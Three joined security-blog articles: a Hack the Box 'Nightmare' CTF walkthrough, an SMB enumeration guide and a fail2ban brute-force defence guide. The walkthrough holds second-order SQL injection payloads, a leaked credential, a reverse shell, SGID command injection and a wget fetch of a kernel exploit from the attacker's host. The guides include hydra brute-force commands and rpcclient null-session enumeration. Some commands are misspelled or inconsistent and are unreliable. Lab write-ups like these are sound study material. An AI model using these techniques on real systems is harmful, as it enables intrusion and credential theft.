Hack the Box: Nightmare Walkthrough

Today we are going to solve another CTF challenge “Nightmare”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Nightmare is 10.10.10.66

Penetrating Methodology

·         Network scanning (Nmap)

·         Browsing IP address through HTTP

·         Checking for SQL injection vulnerability

·         Exploiting Second Order Injection

·         Login through SSH

·         Login through SFTP

·         Exploiting SFTP to gain reverse shell

·         Discovering files with SGID bit set

·         Privileges escalation using “sls”

·         Finding exploit for kernel

·         Making changes to the exploit

·         Getting root privilege using exploit

·         Getting root flag

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sC -sV 10.10.10.66

The Nmap output shows us that there are 4 ports open: 80(HTTP), 2222(SSH)

We find that port 80 is running http, so we open the IP in our browser.

When we visit the webpage, we find a login page. After trying few SQL injection commands we find that this page is vulnerable to “second order SQL injection”. This means to exploit this vulnerability we have to register a user with our SQL injection query and then login with same username.

First we register a user with credentials “admin’):pass” using the register link on the login page. Now when we login using this user we get an SQL error on the web page.

After finding the web application is vulnerable to Second Order SQL Injection. We now find the number of columns. We register a user with the following credentials:

Username: admin ‘) order by 3#

Password: pass

We keep the password same for the user we register.

Now when we login, we get an SQL error that means the table has less than three columns. So we again register a user using the following query:

admin ‘) order by 2#

When we login, we find that we do not have an SQL error that means the table has 2 columns.

Now we are going to find the version of SQL database it is running. To find the version of the database we are going to register with the following query:

admin’) union select 1, @@version#

After finding the version we now know that it is a MySQL database. Now we find the name of the database. To find the name of the database we register with the following query:

admin’) union select 1, database()#

Now we get the database to be called “notes” but we want the names of all the databases on the server. So we register a user using the following query:

admin’) union select 1, group_concat(distinct table_schema) from information_schema.tables#

We get another database called “sysadmin”; we find the table names inside “sysadmin”. To find the table names with we register the user with following query:

admin’) union select 1, group_concat(distinct table_name) from information_schema.columns where table_schema=”sysadmin”#

We find two tables called “users” and “configs”; we now find the column name inside “users” table. To find the column names we register a user with the following query:

admin’) union select 1, group_concat(distinct column_name) from information_schema.columns where table_schema=”sysadmin” and table_name=”users”#

Now we find two columns called “username” and “password”. To find the data inside the columns we are going to register a user with the following query:

admin’) union select 1, group_concat(username, 0x7c, password, 0x0a) from sysadmin.users#

Now we find different username passwords; we try to login through SSH using these credentials and find that we were able to login using the credentials “ftpuser:@whereyougo?” . We are unable to get a shell using SSH, instead we tried to connect using sftp and were successfully able to login.

ssh -p 2222 ftpuser@10.10.10.66

sftp -p 2222 ftpuser@10.10.10.66

Now as we are not able to get a shell using SSH, we tried to find sftp exploit and were able to find a exploit. You can download the exploit from here.

We made changes to the exploit so that we can get a reverse shell.

After making changes to the exploit, we setup our listener using netcat and then run the script.

python sftp-exploit.py

On our listener we get a reverse shell.

nc -lvp 443

After getting the reverse shell we spawn a TTY shell. Then inside /home/decoder/ directory we find a directory called “test” and user called “user.txt”. As they belong to “decoder” group, we find files that belong to “decoder” group.

python -c “import pty; pty.spawn(‘/bin/bash’)”

find / -group “decoder” 2>/dev/null

Now running the sls command we find that it is a binary file that is running ls command. It also has SGID bit set, so we can abuse this to escalate our privilege.

We use strings command to check the binary and find that it is using system function to execute “ls” command.

strings /usr/bin/sls

Now as ls command is execute inside system function; we are going to use -b argument to execute our command.

sls -b ‘

bash -p

‘

After getting a shell we run “id” command and find that we have spawned a shell as user “decoder”. We now can open “user.txt” file and find the first flag.

Enumerating the system we now check the kernel version to check if there is any exploit available for privilege escalation.

uname -a

We find that the version of kernel is vulnerable to this exploit here.

We download the code on our machine and compile it using gcc. Then we start python http server and send the compiled exploit file to the target machine. When we run the exploit we are unable to get a privileged shell as it shows an error saying that the kernel version is not recognized.

In kali machine:

gcc -o priv 43418.c

python -m SimpleHTTPServer 80

On target machine:

wget http://10.10.14.2/priv

chmod +x priv

./priv

Now we have to make a few changes for the exploit to work. So we opened the c file again and make the changes.

Now we again compile and send the file to the target machine. This time when we run the file we get an error saying permission denied on set_groups.

So we exited the shell and ran the exploit as ftpuser. As soon as we run the exploit we get a root shell.

We go to /root directory and find a file called “root.txt”. When we open the file we get the final flag.

A Little Guide to SMB Enumeration

A Little Guide to SMB Enumeration

Enumeration is very essential phase of Penetration testing, because when a pentester established active connection with victim, then he try to retrieve as much as possible information of victim’s machine, which could be useful to exploit further.

In this article, we had explore SMB enumeration using Kali Linux inbuilt command-line tools only.

Table of Content

§  Nmblookup

§  nbtscan               

§  SMBMap

§  Smbclient

§  Rpcclient

§  Nmap

§  Enum4linux

nmblookup

nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries. The options allow the name queries to be directed at a particular IP broadcast area or to a particular machine. All queries are done over UDP.

nmblookup -A 192.168.1.103

nmblookup is helpful command for enumerating domain/workstation and MAC address. NetBIOS work with the help of NetBIOS suffixes as state following information:

For unique names:

    00: Workstation Service (workstation name)

    03: Windows Messenger service

    06: Remote Access Service

    20: File Service (also called Host Record)

    21: Remote Access Service client

    1B: Domain Master Browser – Primary Domain Controller for a domain

    1D: Master Browser

For group names:

    00: Workstation Service (workgroup/domain name)

    1C: Domain Controllers for a domain

    1E: Browser Service Elections

nbtscan

This is a command utility that try to scan NETBIOS name servers open on a local or remote TCP / IP network and because it is a first step in finding open shares. It is created on the functionality of the Windows standard tool “nbtstat”, and it works on a whole subnet instead of individual IP.

nbtscan 192.168.1.1/24

 As you can observe it has dump almost same result as above, but the most important fact is that it enumerate whole subnet.

SMBMap

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

smbmap -H 192.168.1.102

smbmap -H 192.168.1.102 -d metasploitable -u msfadmin -p msfadmin

As you can observe, this tool not only shows share files even show their permission. If you will notice second command then you will perceive that it has shown permission for user “msfadmin”.

Smbclient

smbclient is a client that can 'talk' to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on

smbclient -L 192.168.1.102

smbclient //192.168.1.102/tmp

As you can observe with the help of smbclient we are able to view share folder of victim’s machine. Moreover we can use smbclient for sharing file in the network. Here you can observe we had login successfully using anonymous login and transfer the user.txt file.

Rpcclient

rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. It has undergone several stages of development and stability. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation.

We can use rpcclient to open an authenticated SMB session to a target machine by running the below command on our system where we have used a NULL Session, as we have entered a username of "".

rpcclient -U “” -N 192.168.1.102

enumdomusers

Further we had use enumerate user command, and you can see the user names as well as their RID (the suffix of their SID) in hexadecimal form.

We have use the queryuser command to catch all kinds of information related to an individual user based uniquely on the users RID in hexa form, here RID: 0x3e8 denotes root user account.

queryuse 0x3e8

Here note that the output result shows the last logon time for the user root, as well as the Password last set Time. Such kind of things is very valuable for penetration testers. And, this all can be achieve without an admin user name and password.

Nmap

Following Script attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

nmap --script smb-vuln* -p 139,445 192.168.1.103

The script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems.

From the given below image you can observe, it found target machine is vulnerable to ms17-010 due to SMBv1.

Enum4linux

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.

The tool usage can be found below followed by examples, previous versions of the tool can be found at the bottom of the page.

Key features:

• RID cycling (When RestrictAnonymous is set to 1 on Windows 2000)
• User listing (When RestrictAnonymous is set to 0 on Windows 2000)
• Listing of group membership information
• Share enumeration
• Detecting if host is in a workgroup or a domain
• Identifying the remote operating system
• Password policy retrieval (using polenum)

enumlinux -a 192.168.1.102

As you can observe, it has shown target belongs to Workgroup and dump NetBIOS name along with their suffix and many more informations.

Also perform enumerate user along with their RID in hexadecimal form with the help of rpcclient. Hence enum4linux is Swiss-knife when we perform enumeration. But it cannot identify SMB vulnerability like Nmap.

Defend against Brute Force Attack with Fail2ban

Daily we hear some news related to cybercrime just, like, some malicious users or bots has successfully defaced some publicly accessible website or some services. As we always try to explain through our articles, how such types of activities are possible when system is weak configured or misconfigured. Therefore, it is important to build some security measures such as IDS/IPS within firewall to defend your server and clients while configuring it.

In this article we will show, how you can protect your network from brute force attack and running services on a network?

And the Answer is: By Implementing IPS in your network.

Table of Content

·         What is an IPS?

·         Introduction to fail2ban

·         Lab Set-up Requirement

·         Brute Force Attack in Absence of IPS

·         Intrusion Prevention Lab Set-Up

·         Configure Fail2Ban

·         Protect SSH Against Brute Force Attack

·         Testing Fail2ban

·         How to unban IP in fail2ban for SSH

·         Protect FTP against Brute Force Attack

·         Testing Fail2ban for VSFTP

·         Unban IP for VSFTPD

What is an IPS?

Intrusion Prevention System is short term as IPS, it a network security measures to examine the incoming traffic to perform intrusion detection and then block the detected incidents. For example, an IPS can drop malicious packets, ban the traffic  coming from an offending IP address.

Introduction to fail2ban

Fail2ban scans log files (e.g. /var/log/apache/error_log) and bans IPs that show the malicious signs -- too many password failures, seeking for exploits, etc. Generally Fail2Ban is then used to update firewall rules to reject the IP addresses for a specified amount of time.

In this article, I will discuss how to prevent your running services against brute force attack using fail2ban.

Source : https://www.fail2ban.org/wiki/index.php/Main_Page

Lab Set-up Requirement

Victim’s Machine: Ubuntu 14.04  (192.168.0.105)

Pentester’s Machine: Kali Linux (192.168.0.105)

Brute Force Attack in Absence of IPS

Now let’s try to launch a brute force attack when on port 22 which is open in the target’s network to make unauthorized login. With the help hydra we will try to guess SSH login credential.

hydra -L user.txt -P pass.txt 192.168.0.105 ssh

As you can observe in the above image that it has successfully found aarti:123 for ssh login. Similarly, let’s try to launch a brute force attack when on port 21 which is open in the target’s network to make unauthorized login. With the help hydra we will try to guess FTP login credential.

hydra -L user.txt -P pass.txt 192.168.0.105 ftp

And from the given below image you can observe, how badly these services are configured. Even the network administrator has not followed the password complexity rules as a result, it is so easy to launch a brute force against such type of network.

Intrusion Prevention Lab Set-Up

Therefore, I decided to set-up Intrusion Prevention system in this network which will monitor the incoming packet’s and detects the malicious activities and block that traffic coming from wicked IP. It is very easy to install fail2ban as Ubuntu already has a package for fail2ban in apt-repositories.

First of all, let me show you, the Iptables rule list, which is empty as shown in the below image and then execute the installation command. Once it gets completed, then copy the configuration of jail.conf file inside jail.local file.

sudo Iptables -S

sudo apt-get install fail2ban

NOTE: While configuring fail2ban in your local machine, you must have root access or can use non-root user with sudo rights.

Configure Fail2Ban

The service fail2ban has its default configuration files “jail.local” in the /etc/fail2ban directory, therefore, you should not edit this file, but you can override this into jail.local file with the help of below command and then open that file for configuring it as per your requirement.

Above you have seen that we had successfully launched brute force attack on SSH and FTP, therefore I will configure fail2ban to stop brute force attack in the network.

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

sudo gedit /etc/fail2ban/jail.local

Once the file gets opened you need to focus few things such as “ignoreip, bantam, maxretry” and then modify their value as per your requirement. Set the IPs you want fail2ban to ignore as ignoreip, set the ban time (in second) for a particular time period and maximum number for the user attempts.

ignoreip = 192.168.0.105 127.0.0.1

bantime = 600

maxretry = 3

Protect SSH Against Brute Force Attack

Ultimately, we come towards that portion of the configuration file which deals with specific services. These are identified by the section headers, such as [ssh].

To enable each of these sections uncomment header [ssh] and modify the enabled value into "true" as shown in the below image and then save the jail.local file and restart the fail2ban service:

[ssh]

enable = true

service fail2ban restart

Testing Fail2ban for SSH

Fail2ban offers a command “fail2ban-client” that can be used to execute Fail2ban from the command line, to check that the Fail2Ban is running and the SSH jail is enabled you can follow the below syntax confirm its status.

Syntax: fail2ban-client COMMAND

sudo fail2ban-client status

sudo fail2ban-client status ssh

As you can observe, currently filter list and action list is set as 0 or all I can say, it is empty. These values will get change if someone tries to cross the limit of maxretry.

As said above fail2ban will update iptables rules to reject the IP addresses for a specified amount of time and from the given below image you can observe, last 3 policies is automatically created by fail2ban.

Now let’s test host machine against brute force attack for ssh login once again:

hydra -L user.txt -P pass.txt 192.168.0.105 ssh

And as you can obverse, this time we got “Connection refused” error while brute forcing attack on port 22.

Hmm!! Not bad, let’s also check the status for ssh jail status after this attack.

sudo fail2ban-client status ssh

Now you can observe that in the given below image, it has shown 1 ban IP: 192.168.0.104 and anybody can explore log file too for more details.

tail /var/log/auth.log

How to unban IP in fail2ban for SSH

If you wish to unban the IP then again, you can go with fail2bain-client commands and do the same as done here:

failban-client -i

set ssh unbanip 192.168.0.104

exit

sudo fail2ban-client status ssh

And when you will check ssh jail status one more time, this time it won’t be showing any IP in the IP list.

Protect FTP against Brute Force Attack

Similarly, to enable FTP sections uncomment [vsftpd] header and change the enabled line to be "true" as shown in the below image and even you can modify maxretry or log file path as per your requirement.

[vsftpd]

enabled = true

maxretry = 3

Testing Fail2ban for VSFTPD

Now save the jail.local file and restart the fail2ban service and then you can check fail2ban and its Jail status including Iptables rules.

sudo service fail2ban restart

sudo fail2ban-client status

sudo fail2ban-client status vsftpd

iptables -S

With the help of above command we concluded that now there are two jails: ssh and vsftpd and also some new fail2ban policies have been created within iptables.

Now let’s test host machine against brute force attack for ftp login:

hydra -L user.txt -P pass.txt 192.168.0.105 ftp

And as you can obverse, this time we got connection refused error while brute force attack and let’s check status for vsftpd  jail status once again.

sudo fail2ban-client status vsftpd

Yet again you can observe that in the given below image, it has shown 1 ban IP: 192.168.0.104 and anybody can check log file too for more details.

tail /var/log/vsftpd.log

And look at the vsftpd log file, contains all detailed related to login attempt.

Unban IP in fail2ban for VSFTPD

If you wish to unban or unblock the IP then again, you can go with fail2bain-client commands and do the same as done here:

sudo failban-client -i

set ssh unbanip 192.168.0.104

exit

sudo fail2ban-client status vsftpd

And when you will check vsftpd jail status once again, this time it won’t be showing any IP in the IP list.

Hope! You people will enjoy this articles and find helpful in your network penetration testing and you can do more with fail2ban for securing your network.